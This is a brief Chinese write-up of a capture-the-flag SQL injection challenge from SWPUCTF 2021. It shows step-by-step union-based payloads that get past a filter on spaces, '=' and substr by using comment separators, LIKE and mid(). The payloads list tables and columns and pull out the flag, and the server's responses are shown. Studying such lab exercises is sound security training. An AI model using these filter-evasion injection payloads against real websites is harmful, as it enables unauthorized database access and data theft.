这题可以参考文章:[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
这题相比于参考文章的题目多了waf过滤
首先,仍然是网站标题提示参数是wllm
1、fuzz看哪些关键字被过滤:空格、substr、=被过滤
2、?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),2%23
Your Login name:LTLT_flag,users —— 得到LTLT_flag
3、?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT%'),2%23
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了
4、?wllm=-1'/**/union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),1,30),2%23
Your Login name:NSSCTF{b71181f2-7f93
5、?wllm=-1'/**/union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),20,100),2%23
Your Login name:3-4605-949f-ec530e076207}